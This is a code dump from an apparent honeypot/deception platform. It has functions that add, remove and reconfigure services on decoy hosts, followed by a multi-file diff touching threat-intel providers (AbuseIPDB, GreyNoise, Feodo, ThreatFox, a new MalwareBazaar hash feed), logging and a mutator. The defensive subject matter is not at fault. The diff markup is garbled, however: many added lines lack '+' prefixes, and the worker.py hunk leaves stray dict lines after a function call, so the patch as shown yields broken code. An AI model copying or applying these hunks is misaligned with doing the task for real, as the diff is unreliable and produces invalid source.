    repo: BaseRepository, decky_name: str, service_name: str,
 ) -> list[str]:
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    services: list[str] = list(decky.services or [])
    if service_name not in services:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    services = [s for s in services if s != service_name]
    target = f"{decky_name}-{service_name}"
    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if not swarm_host_uuid:
        # Local: stop+rm before persist so the operator has a clear retry
        # state if compose fails halfway. Swarm: skip — the worker's compose
        # will handle the removal when the redispatched config drops the
        # service from the decky.
        await anyio.to_thread.run_sync(
            lambda: _compose("stop", target, compose_file=compose_path),
        )
        await anyio.to_thread.run_sync(
            lambda: _compose("rm", "-f", target, compose_file=compose_path),
        )
    await _persist_fleet_change(repo, decky, services, compose_path)
    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    return services
 # ---------------------------------------------------------- public api
 async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
 ) -> list[str]:
    """Add *service_name* to a deployed decky.
    Validates the service registry (rejects unknown / fleet_singleton
    names) and the optional ``config`` against the service's schema,
    persists the change, regenerates the compose file, runs
    ``up -d --no-deps --build <decky>-<service>`` in a worker thread,
    and publishes ``decky.<name>.service.added`` on the bus.
    ``config`` is the same dict shape PUT/POST .../config accepts; it's
    coerced via ``BaseService.validate_cfg`` before any state write so
    a 400-class failure leaves zero side-effects.
    Returns the post-mutation services list.
    """
    svc = _validate_service_for_per_decky(service_name)
    initial_config = svc.validate_cfg(config) if config else {}
    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=initial_config,
        )
    elif decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=initial_config,
        )
    else:  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
        {
            "decky_name": decky_name,
            "service_name": service_name,
            "topology_id": topology_id,
            "services": services,
        },
    )
    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
 async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
 ) -> dict:
    """Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
    The submitted dict is validated against the service's
    ``config_schema`` (unknown keys dropped, types coerced) BEFORE any
    DB write, so a 400-class failure leaves zero side-effects.
    ``apply=False`` (Save):  only the DB row + compose file are updated.
                             The running container keeps its old env.
    ``apply=True``  (Apply): same persistence, then a force-recreate of
                             ``<decky>-<service>`` so the container picks
                             up the new env.  Destructive: drops any
                             in-container session state on that service.
    Returns the post-mutation validated cfg.
    """
    svc = _validate_service_for_per_decky(service_name)
    validated = svc.validate_cfg(cfg)
    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )
    elif decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
        {
            "decky_name": decky_name,
            "service_name": service_name,
            "topology_id": topology_id,
            "service_config": validated,
            "recreated": bool(apply),
        },
    )
    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
 async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
 ) -> None:
    decky = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (decky.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    cfg_blob = dict(decky.get("decky_config") or {})
    sc = dict(cfg_blob.get("service_config") or {})
    sc[service_name] = validated
    cfg_blob["service_config"] = sc
    await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
    compose_path = await _rerender_topology_compose(repo, topology_id)
    if apply:
        if await _topology_is_agent_pinned(repo, topology_id):
            await _resync_agent_topology(repo, topology_id)
        else:
            target = f"{decky_name}-{service_name}"
            await anyio.to_thread.run_sync(
                lambda: _compose(
                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
                    compose_file=compose_path,
                ),
            )
 async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
 ) -> None:
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    if service_name not in (decky.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    sc = dict(getattr(decky, "service_config", None) or {})
    sc[service_name] = validated
    decky.service_config = sc
    _save_state(config, compose_path)
    _write_compose(config, compose_path)
    from decnet.web.db.models import LOCAL_HOST_SENTINEL
    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": list(decky.services or []),
        "decky_config": decky.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
    if apply:
        swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
        if swarm_host_uuid:
            await _redispatch_fleet_shard(repo, swarm_host_uuid)
        else:
            target = f"{decky_name}-{service_name}"
            # Docker Compose tracks the previous container by ID. If that
            # container was already removed (or renamed during a prior failed
            # deploy), --force-recreate fails with "No such container". Pre-
            # remove by name so Compose starts from a clean slate.
            await anyio.to_thread.run_sync(
                lambda: subprocess.run(  # nosec B603 B607
                    ["docker", "rm", "-f", target],
                    capture_output=True,
                ),
            )
            await anyio.to_thread.run_sync(
                lambda: _compose(
                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
                    compose_file=compose_path,
                ),
            )
 async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
 ) -> list[str]:
    """Remove *service_name* from a deployed decky.
    Stops + removes the service container, persists the new services
    list, re-renders the compose file (so the next ``up -d`` doesn't
    bring it back), and publishes ``decky.<name>.service.removed``.
    Returns the post-mutation services list.
    """
    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )
    elif decky_kind == "fleet":
        services = await _remove_fleet_service(repo, decky_name, service_name)
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
        {
            "decky_name": decky_name,
            "service_name": service_name,
            "topology_id": topology_id,
            "services": services,
        },
    )
    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
--- a/decnet/env.py
+++ b/decnet/env.py
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
 # DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
 # updater / swarmctl subcommands (which never touch auth) can start without
 # the master's JWT secret being present in the environment.
-DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
+DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
 # Agent-side RFC 5424 sink written by decnet.collector.worker when run on
 # a SWARM worker.  The forwarder tails this file and ships lines over
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
 DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
 DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
 DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
 # Bind address for the master-side swarm controller. Loopback by default —
 # operators flip to 0.0.0.0 (or a specific NIC) on production masters where
 # workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
 # swarmctl-host in /etc/decnet/decnet.ini.
 DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
 # Ingester batching: how many log rows to accumulate per commit, and the
 # max wait (ms) before flushing a partial batch. Larger batches reduce
--- a/decnet/fleet/reconciler.py
+++ b/decnet/fleet/reconciler.py
@@ -128,8 +128,6 @@ async def reconcile_once(
    container_states = await asyncio.to_thread(
        _collect_container_states, docker_client_factory,
    )
    docker_known = container_states is not None
    json_names = {d.name for d in json_deckies}
    # 1. INSERT: present in JSON, absent from DB.
@@ -138,7 +136,7 @@ async def reconcile_once(
            continue
        new_state = (
            _aggregate_decky_state(d.name, list(d.services), container_states)
-            if docker_known else "running"
+            if container_states is not None else "running"
        )
        row_host = d.host_uuid or host_uuid
        await repo.upsert_fleet_decky({
@@ -168,7 +166,7 @@ async def reconcile_once(
            )
    # 3. STATE: present in both, docker says something fresh.
-    if docker_known:
+    if container_states is not None:
        for d in json_deckies:
            existing = db_by_name.get(d.name)
            if existing is None:
--- a/decnet/geoip/rir/provider.py
+++ b/decnet/geoip/rir/provider.py
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
 from decnet.geoip.lookup import Lookup
 from decnet.geoip.paths import ensure_root
 from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
-from decnet.geoip.rir.parse import parse_file
+from decnet.geoip.rir.parse import Range, parse_file
 logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
            except Exception as exc:
                logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
-        ranges = []
+        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
--- a/decnet/intel/abuseipdb.py
+++ b/decnet/intel/abuseipdb.py
@@ -17,7 +17,6 @@ later if operators report drift.
 """
 from __future__ import annotations
 import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
        data = payload.get("data") or {}
        score = int(data.get("abuseConfidenceScore") or 0)
        verdict = _score_to_verdict(score)
        # AbuseIPDB returns ``data.reports[*].categories`` — a list of
        # int codes per report. Flatten the union across all recent
        # reports so the IntelLifter sees the full activity profile,
        # not just the most-recent report's categories. Sorted for
        # determinism (matters for tests + for the bus payload diff).
        categories: set[int] = set()
        for report in data.get("reports") or []:
            if not isinstance(report, dict):
                continue
            for cat in report.get("categories") or []:
                if isinstance(cat, int):
                    categories.add(cat)
        return IntelResult(
            provider=self.name,
            verdict=verdict,
            column_updates={
                "abuseipdb_score": score,
-                "abuseipdb_raw": json.dumps(data),
+                "abuseipdb_categories": sorted(categories),
                "abuseipdb_raw": data,
                "abuseipdb_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/base.py
+++ b/decnet/intel/base.py
@@ -78,3 +78,33 @@ class IntelProvider(ABC):
        entire IP. Implementations should also respect
        ``self._semaphore`` to bound in-flight calls.
        """
 class MalHashProvider(ABC):
    """Abstract bad-hash lookup provider.
    Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
    vs IP), different consumer (the email ingester at observation time,
    not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
    the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
    Concrete impls today:
    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
      shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
    Future impls (paid VirusTotal subscription, in-house allowlist) plug
    in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
    """
    name: str
    @abstractmethod
    async def is_known_bad(self, sha256: str) -> bool:
        """Return whether *sha256* is on this provider's bad-hash list.
        MUST NOT raise — return ``False`` on any error (the caller is the
        ingester, not a worker; an exception here would taint a totally
        unrelated bus payload). The provider is responsible for logging
        its own errors.
        """
--- a/decnet/intel/factory.py
+++ b/decnet/intel/factory.py
@@ -21,7 +21,7 @@ from __future__ import annotations
 import os
 from typing import List
-from decnet.intel.base import IntelProvider
+from decnet.intel.base import IntelProvider, MalHashProvider
 _KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
    return [p.strip().lower() for p in raw.split(",") if p.strip()]
 _mal_hash_singleton: MalHashProvider | None = None
 _mal_hash_initialized: bool = False
 def get_mal_hash_provider() -> MalHashProvider | None:
    """Return the configured malware-hash lookup provider singleton.
    Sibling factory to :func:`get_intel_providers` — different keyspace
    (file SHA-256 vs IP), different consumer (the email ingester at
    observation time, not the IP-keyed intel-worker fan-out). Returns
    ``None`` only if intel is disabled wholesale; otherwise returns a
    provider whose :meth:`is_known_bad` self-disables to a no-op when
    ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
    has to special-case "no provider configured."
    """
    global _mal_hash_singleton, _mal_hash_initialized
    if _mal_hash_initialized:
        return _mal_hash_singleton
    _mal_hash_initialized = True
    if not _enabled():
        _mal_hash_singleton = None
        return None
    from decnet.intel.mal_hash import MalwareBazaarProvider
    _mal_hash_singleton = MalwareBazaarProvider()
    return _mal_hash_singleton
 def _reset_mal_hash_provider_for_testing() -> None:
    """Test hook — drop the singleton so the next call re-reads env."""
    global _mal_hash_singleton, _mal_hash_initialized
    _mal_hash_singleton = None
    _mal_hash_initialized = False
 def get_intel_providers() -> List[IntelProvider]:
    """Return the configured threat-intel providers.
--- a/decnet/intel/feodo.py
+++ b/decnet/intel/feodo.py
@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
 """
 from __future__ import annotations
 import json
 import time
 from datetime import datetime, timezone
 from typing import Any, Optional
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
                verdict=None,  # absence ≠ "benign", let other providers speak
                column_updates={
                    "feodo_listed": False,
-                    "feodo_raw": "{}",
+                    "feodo_malware_family": None,
                    "feodo_raw": {},
                    "feodo_queried_at": datetime.now(timezone.utc),
                },
            )
        family_obj = entry.get("malware")
        family = (
            family_obj if isinstance(family_obj, str) and family_obj else None
        )
        return IntelResult(
            provider=self.name,
            verdict="malicious",
            column_updates={
                "feodo_listed": True,
-                "feodo_raw": json.dumps(entry),
+                "feodo_malware_family": family,
                "feodo_raw": entry,
                "feodo_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/greynoise.py
+++ b/decnet/intel/greynoise.py
@@ -25,7 +25,6 @@ Status code semantics:
 """
 from __future__ import annotations
 import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
                verdict="unknown",
                column_updates={
                    "greynoise_classification": "unknown",
-                    "greynoise_raw": json.dumps({"message": "not seen"}),
+                    "greynoise_name": None,
                    "greynoise_tags": [],
                    "greynoise_raw": {"message": "not seen"},
                    "greynoise_queried_at": datetime.now(timezone.utc),
                },
            )
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):
        classification = (data.get("classification") or "unknown").lower()
        verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
        # The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
        # "Censys") but no behavioral tag list — the tag taxonomy is
        # paid-tier only. Persist whatever we got; a future non-Community
        # provider may populate ``greynoise_tags``.
        name_obj = data.get("name")
        name = name_obj if isinstance(name_obj, str) and name_obj else None
        tags_obj = data.get("tags")
        tags: list[str] = (
            [t for t in tags_obj if isinstance(t, str)]
            if isinstance(tags_obj, list) else []
        )
        return IntelResult(
            provider=self.name,
            verdict=verdict,
            column_updates={
                "greynoise_classification": classification,
-                "greynoise_raw": json.dumps(data),
+                "greynoise_name": name,
                "greynoise_tags": tags,
                "greynoise_raw": data,
                "greynoise_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/mal_hash.py
+++ b/decnet/intel/mal_hash.py
@@ -0,0 +1,195 @@
 """MalwareBazaar bad-hash provider — bulk SHA-256 feed.
 Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
 shape, but operates on the SHA-256 keyspace instead of IPs and so
 implements :class:`decnet.intel.base.MalHashProvider` rather than
 :class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
 Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
 ``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
 sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
 30 MB resident as a ``set[str]`` of hex-lowercased hashes.
 Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
 the provider logs one warning at first refresh attempt and disables
 itself for the process lifetime — :meth:`is_known_bad` returns ``False``
 without ever making a network call. The ingester treats that the same
 as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
 bus payload (which is exactly what the predicate's ``is True`` check
 does today, so the silent-no-op is behaviorally identical to "lane not
 shipped yet").
 """
 from __future__ import annotations
 import csv
 import io
 import os
 import time
 import zipfile
 from typing import Optional
 from decnet.intel.base import MalHashProvider
 from decnet.logging import get_logger
 from decnet.net.http import stealth_client
 log = get_logger("intel.mal_hash")
 _ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
 _DEFAULT_REFRESH_S = 86_400.0  # 24h — feed is daily, no need to hammer
 _AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
 _REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
 def _read_refresh_interval() -> float:
    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
    if raw is None:
        return _DEFAULT_REFRESH_S
    try:
        return float(raw)
    except ValueError:
        log.warning(
            "%s=%r not a float; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
 class MalwareBazaarProvider(MalHashProvider):
    """Bulk SHA-256 lookup against MalwareBazaar's full export."""
    name = "malwarebazaar"
    def __init__(
        self,
        *,
        auth_key: Optional[str] = None,
        refresh_interval_s: Optional[float] = None,
    ) -> None:
        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
        self._refresh_interval_s = (
            refresh_interval_s
            if refresh_interval_s is not None
            else _read_refresh_interval()
        )
        self._known: set[str] = set()
        self._loaded_at: float = 0.0
        self._last_error: Optional[str] = None
        self._disabled_warned: bool = False
    @property
    def disabled(self) -> bool:
        return self._auth_key is None
    async def _refresh(self) -> Optional[str]:
        """Refetch the bulk feed. Returns an error string or ``None``."""
        if self._auth_key is None:
            return "no auth key"
        try:
            async with stealth_client(timeout=60.0) as client:
                resp = await client.get(
                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
                )
        except Exception as exc:  # noqa: BLE001
            return f"network: {exc}"
        if resp.status_code != 200:
            return f"HTTP {resp.status_code}"
        body = resp.content
        try:
            new_known = _parse_dump(body)
        except Exception as exc:  # noqa: BLE001
            return f"parse: {exc}"
        if not new_known:
            return "feed: empty"
        self._known = new_known
        self._loaded_at = time.monotonic()
        self._last_error = None
        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
        return None
    async def _ensure_fresh(self) -> None:
        if self.disabled:
            if not self._disabled_warned:
                log.warning(
                    "R0046 mal_hash_match disabled: %s unset",
                    _AUTH_KEY_ENV,
                )
                self._disabled_warned = True
            return
        if (
            not self._known
            or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
        ):
            err = await self._refresh()
            if err:
                self._last_error = err
                log.warning("malwarebazaar refresh failed: %s", err)
    async def is_known_bad(self, sha256: str) -> bool:
        if self.disabled:
            return False
        try:
            await self._ensure_fresh()
        except Exception as exc:  # noqa: BLE001
            # Belt and braces: _ensure_fresh swallows refresh failures
            # but a bug in there shouldn't blow up the ingester payload.
            log.exception("malwarebazaar refresh raised: %s", exc)
            return False
        return sha256.lower() in self._known
 def _parse_dump(body: bytes) -> set[str]:
    """Extract SHA-256 hashes from MalwareBazaar's full dump.
    The endpoint returns a ZIP archive containing a single CSV with a
    ``sha256_hash`` column. Some abuse.ch flavours of the same feed
    family ship plain CSV instead — handle both by sniffing the magic
    bytes. Hashes are lowercased; non-hex / wrong-length values are
    dropped (defense in depth — we set-membership-test by exact match).
    """
    if body[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
            if not csv_names:
                raise ValueError("zip has no .csv member")
            with zf.open(csv_names[0]) as fh:
                csv_bytes = fh.read()
    else:
        csv_bytes = body
    text = csv_bytes.decode("utf-8", errors="replace")
    return _extract_hashes(text)
 def _extract_hashes(text: str) -> set[str]:
    """Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
    The dump prefaces the table with ``#``-prefixed comment lines.
    Skip those, find the header row, locate the column, then read the
    rest. csv.reader handles the quoting (the ``signature`` column
    contains commas and is properly quoted in the dump).
    """
    body_lines = [
        line for line in text.splitlines()
        if line and not line.lstrip().startswith("#")
    ]
    if not body_lines:
        return set()
    reader = csv.reader(body_lines)
    header = next(reader, None)
    if not header:
        return set()
    norm = [h.strip().strip('"').lower() for h in header]
    try:
        col = norm.index("sha256_hash")
    except ValueError:
        # Fallback — first column is sha256 in every documented
        # variant; if the header naming changes upstream we still
        # capture something rather than silently emptying the set.
        col = 0
    out: set[str] = set()
    for row in reader:
        if len(row) <= col:
            continue
        cell = row[col].strip().strip('"').lower()
        if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
            out.add(cell)
    return out
--- a/decnet/intel/threatfox.py
+++ b/decnet/intel/threatfox.py
@@ -12,7 +12,6 @@ caps requests/min — the provider works either way.
 """
 from __future__ import annotations
 import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,10 @@ class ThreatFoxProvider(IntelProvider):
                verdict=None,  # absence is not a benign signal
                column_updates={
                    "threatfox_listed": False,
-                    "threatfox_raw": "{}",
+                    "threatfox_threat_types": [],
                    "threatfox_ioc_types": [],
                    "threatfox_malware_families": [],
                    "threatfox_raw": {},
                    "threatfox_queried_at": datetime.now(timezone.utc),
                },
            )
@@ -83,12 +85,37 @@ class ThreatFoxProvider(IntelProvider):
        data = payload.get("data") or []
        listed = bool(data)
        # Each match in ``data`` carries threat_type / ioc_type / malware
        # (canonical family). The IntelLifter dispatches ATT&CK techniques
        # off ``threat_type`` (botnet_cc / payload_delivery / payload /
        # cc_skimming); the other two columns are evidence and SIEM
        # context. Sets are flattened across matches and serialised
        # sorted for determinism.
        threat_types: set[str] = set()
        ioc_types: set[str] = set()
        families: set[str] = set()
        if isinstance(data, list):
            for entry in data:
                if not isinstance(entry, dict):
                    continue
                tt = entry.get("threat_type")
                if isinstance(tt, str) and tt:
                    threat_types.add(tt)
                it = entry.get("ioc_type")
                if isinstance(it, str) and it:
                    ioc_types.add(it)
                family = entry.get("malware") or entry.get("malware_printable")
                if isinstance(family, str) and family:
                    families.add(family)
        return IntelResult(
            provider=self.name,
            verdict="malicious" if listed else None,
            column_updates={
                "threatfox_listed": listed,
-                "threatfox_raw": json.dumps(data),
+                "threatfox_threat_types": sorted(threat_types),
                "threatfox_ioc_types": sorted(ioc_types),
                "threatfox_malware_families": sorted(families),
                "threatfox_raw": data,
                "threatfox_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/worker.py
+++ b/decnet/intel/worker.py
@@ -59,6 +59,38 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
    return None
 def _build_intel_event_payload(
    attacker_uuid: str,
    ip: str,
    row: dict[str, Any],
    providers: list[IntelProvider],
 ) -> dict[str, Any]:
    """Project the AttackerIntel row into the bus event the TTP worker
    consumes as ``source_kind="intel"``.
    """
    return {
        "attacker_uuid": attacker_uuid,
        "attacker_ip": ip,
        "aggregate_verdict": row.get("aggregate_verdict"),
        "providers": [p.name for p in providers],
        # AbuseIPDB
        "abuseipdb_score": row.get("abuseipdb_score"),
        "abuseipdb_categories": row.get("abuseipdb_categories") or [],
        # GreyNoise
        "greynoise_classification": row.get("greynoise_classification"),
        "greynoise_name": row.get("greynoise_name"),
        "greynoise_tags": row.get("greynoise_tags") or [],
        # Feodo
        "feodo_listed": row.get("feodo_listed"),
        "feodo_malware_family": row.get("feodo_malware_family"),
        # ThreatFox
        "threatfox_listed": row.get("threatfox_listed"),
        "threatfox_threat_types": row.get("threatfox_threat_types") or [],
        "threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
        "threatfox_malware_families": row.get("threatfox_malware_families") or [],
    }
 async def _enrich_one(
    attacker_uuid: str,
    ip: str,
@@ -172,12 +204,9 @@ async def run_intel_loop(
                        await publish_safely(
                            bus,
                            _topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
-                            {
+                            _build_intel_event_payload(
-                                "attacker_uuid": attacker_uuid,
+                                attacker_uuid, ip, row, providers,
-                                "attacker_ip": ip,
+                            ),
                                "aggregate_verdict": row.get("aggregate_verdict"),
                                "providers": [p.name for p in providers],
                            },
                            event_type=_topics.ATTACKER_INTEL_ENRICHED,
                        )
                    except Exception:  # noqa: BLE001
@@ -200,11 +229,11 @@ async def run_intel_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
+        for task in (*wake_tasks, heartbeat_task):
-            if t is None:
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/logging/init.py
+++ b/decnet/logging/init.py
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
        self.component = component
    def filter(self, record: logging.LogRecord) -> bool:
-        record.decnet_component = self.component  # type: ignore[attr-defined]
+        record.decnet_component = self.component
        return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
            span = trace.get_current_span()
            ctx = span.get_span_context()
            if ctx and ctx.trace_id:
-                record.otel_trace_id = format(ctx.trace_id, "032x")  # type: ignore[attr-defined]
+                record.otel_trace_id = format(ctx.trace_id, "032x")
-                record.otel_span_id = format(ctx.span_id, "016x")  # type: ignore[attr-defined]
+                record.otel_span_id = format(ctx.span_id, "016x")
            else:
-                record.otel_trace_id = "0"  # type: ignore[attr-defined]
+                record.otel_trace_id = "0"
-                record.otel_span_id = "0"  # type: ignore[attr-defined]
+                record.otel_span_id = "0"
        except Exception:
-            record.otel_trace_id = "0"  # type: ignore[attr-defined]
+            record.otel_trace_id = "0"
-            record.otel_span_id = "0"  # type: ignore[attr-defined]
+            record.otel_span_id = "0"
        return True
--- a/decnet/models.py
+++ b/decnet/models.py
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
    services: list[str] = PydanticField(..., min_length=1)
    distro: str          # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
    base_image: str      # Docker image for the base/IP-holder container
-    build_base: str = "debian:bookworm-slim"  # apt-compatible image for service Dockerfiles
+    build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"  # apt-compatible image for service Dockerfiles; digest pinned via distros.py
    hostname: str
    archetype: str | None = None  # archetype slug if spawned from an archetype profile
    service_config: dict[str, dict] = PydanticField(default_factory=dict)
--- a/decnet/mutator/engine.py
+++ b/decnet/mutator/engine.py
@@ -101,7 +101,10 @@ async def mutate_decky(
    try:
        # Wrap blocking call in thread
-        await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
+        cp = compose_path
        await anyio.to_thread.run_sync(
            lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
        )
    except Exception as e:
        log.error("mutation failed decky=%s error=%s", decky_name, e)
        console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
@@ -161,6 +164,8 @@ async def mutate_all(
        if force or only is not None:
            due = True
        else:
            if interval_mins is None:
                continue
            elapsed_secs = now - decky.last_mutated
            due = elapsed_secs >= (interval_mins * 60)
            remaining = (interval_mins * 60) - elapsed_secs
@@ -284,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
        return 0
    drained = 0
    for topo in pending:
-        tid = topo["id"]
+        tid = topo.id
        try:
            await _deployer.resync_agent_topology(repo, tid)
            await repo.set_topology_resync(tid, False)
            drained += 1
            log.info("topology %s resynced to agent %s",
-                     tid, topo.get("target_host_uuid"))
+                     tid, topo.target_host_uuid)
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "topology %s resync failed (will retry): %s", tid, exc,
@@ -405,11 +410,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
+        for task in (*wake_tasks, heartbeat_task):
-            if t is None:
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/mutator/ops.py
+++ b/decnet/mutator/ops.py
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
    )
